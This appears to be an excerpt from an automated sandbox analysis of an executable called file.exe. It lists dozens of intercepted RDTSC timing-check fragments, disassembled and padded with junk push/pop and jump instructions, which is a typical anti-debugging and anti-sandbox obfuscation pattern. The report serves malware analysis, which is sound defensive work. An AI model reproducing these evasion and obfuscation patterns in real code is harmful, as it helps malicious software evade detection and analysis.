                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14429A8 second address: 14429B6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14429B6 second address: 14429BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443040 second address: 1443069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F8F34B47B56h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8F34B47B66h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443069 second address: 1443096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8F347F9F24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8F347F9F1Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443096 second address: 144309A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1443533 second address: 1443565 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8F347F9F16h 0x00000008 jmp 00007F8F347F9F24h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8F347F9F24h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144369F second address: 14436A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14436A3 second address: 14436A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14436A9 second address: 14436C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8F34B47B5Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14436C0 second address: 14436C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14439BF second address: 14439DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007F8F34B47B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F8F34B47B5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14439DD second address: 14439E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1448234 second address: 144824C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B64h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1448515 second address: 1448519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144867B second address: 1448681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1448AA8 second address: 1448AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F8F347F9F29h 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jl 00007F8F347F9F22h 0x00000015 jno 00007F8F347F9F16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144904C second address: 1449072 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F8F34B47B56h 0x00000011 jnp 00007F8F34B47B56h 0x00000017 jl 00007F8F34B47B56h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jo 00007F8F34B47B56h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1449072 second address: 1449082 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8F347F9F1Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144BD11 second address: 144BD49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F8F34B47B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e jmp 00007F8F34B47B65h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop esi 0x00000016 jmp 00007F8F34B47B5Fh 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144EC29 second address: 144EC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8F347F9F16h 0x0000000a js 00007F8F347F9F16h 0x00000010 jc 00007F8F347F9F16h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144EC49 second address: 144EC4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E419 second address: 144E428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E428 second address: 144E432 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8F34B47B56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E432 second address: 144E442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8F347F9F1Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E75B second address: 144E767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14527BF second address: 14527C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145807A second address: 145807E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145807E second address: 145808E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jc 00007F8F347F9F1Eh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145808E second address: 145809D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F8F34B47B82h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145809D second address: 14580C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F24h 0x00000009 jnp 00007F8F347F9F16h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456A2D second address: 1456A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8F34B47B56h 0x0000000a jc 00007F8F34B47B56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456E28 second address: 1456E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F24h 0x00000009 jmp 00007F8F347F9F1Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push esi 0x00000013 pop esi 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b jo 00007F8F347F9F16h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456E5E second address: 1456E64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456E64 second address: 1456E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456E6A second address: 1456E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401E71 second address: 1401EED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8F347F9F1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub edx, 5798AD6Ah 0x00000013 mov ebx, dword ptr [ebp+12482F9Ah] 0x00000019 mov cl, 5Ch 0x0000001b add eax, ebx 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F8F347F9F18h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov edx, 61AAB838h 0x0000003c pushad 0x0000003d sbb esi, 1D214F06h 0x00000043 ja 00007F8F347F9F1Bh 0x00000049 mov edx, 0488F3D1h 0x0000004e popad 0x0000004f nop 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F8F347F9F29h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401EED second address: 1401F5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007F8F34B47B56h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007F8F34B47B5Ah 0x00000019 popad 0x0000001a pop ecx 0x0000001b nop 0x0000001c add dx, 5FD9h 0x00000021 push 00000004h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F8F34B47B58h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d nop 0x0000003e jmp 00007F8F34B47B65h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jnp 00007F8F34B47B5Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F5A second address: 1401F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14573D8 second address: 14573DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D1E second address: 1457D3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8F347F9F25h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D3E second address: 1457D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D46 second address: 1457D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D4F second address: 1457D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D53 second address: 1457D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D57 second address: 1457D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jbe 00007F8F34B47B5Ch 0x00000010 pushad 0x00000011 jl 00007F8F34B47B56h 0x00000017 jmp 00007F8F34B47B60h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D86 second address: 1457D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B38C second address: 145B3B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8F34B47B61h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B3B7 second address: 145B3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B887 second address: 145B88B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B88B second address: 145B89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8F347F9F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B89B second address: 145B8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145BB27 second address: 145BB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 push edi 0x0000000a ja 00007F8F347F9F16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1462B41 second address: 1462B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B69h 0x00000007 jnp 00007F8F34B47B56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8F34B47B62h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1462CF6 second address: 1462D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8F347F9F16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1462D02 second address: 1462D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463128 second address: 1463144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F23h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146370E second address: 1463718 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8F34B47B56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464285 second address: 146429F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F26h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14694FD second address: 1469501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469501 second address: 1469528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F347F9F27h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F8F347F9F16h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469528 second address: 1469541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B65h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469541 second address: 1469575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 jmp 00007F8F347F9F1Bh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F8F347F9F25h 0x00000015 popad 0x00000016 je 00007F8F347F9F22h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469575 second address: 146957B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146C6B0 second address: 146C6C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146C6C3 second address: 146C6FB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F8F34B47B5Eh 0x00000010 jmp 00007F8F34B47B66h 0x00000015 popad 0x00000016 jno 00007F8F34B47B8Ch 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CB12 second address: 146CB16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CC85 second address: 146CCD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F8F34B47B62h 0x0000000b jnp 00007F8F34B47B56h 0x00000011 jmp 00007F8F34B47B63h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F8F34B47B66h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CDF1 second address: 146CE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8F347F9F16h 0x0000000a jmp 00007F8F347F9F23h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 js 00007F8F347F9F16h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CE19 second address: 146CE34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CE34 second address: 146CE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8F347F9F16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CE3E second address: 146CE42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CE42 second address: 146CE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8F347F9F20h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146D153 second address: 146D159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1474E49 second address: 1474E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1474E52 second address: 1474E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473186 second address: 14731A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8F347F9F21h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147345D second address: 147347A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F8F34B47B5Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d je 00007F8F34B47B56h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C0A second address: 1473C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C10 second address: 1473C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C14 second address: 1473C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F347F9F20h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C2A second address: 1473C34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C34 second address: 1473C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F8F347F9F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F8F347F9F22h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F8F347F9F16h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14744CA second address: 14744DC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F8F34B47B5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14744DC second address: 14744E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14744E7 second address: 14744EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14744EB second address: 14744F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1472BF3 second address: 1472BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1472BF9 second address: 1472C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1472C02 second address: 1472C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1472C06 second address: 1472C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CDBC second address: 147CDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
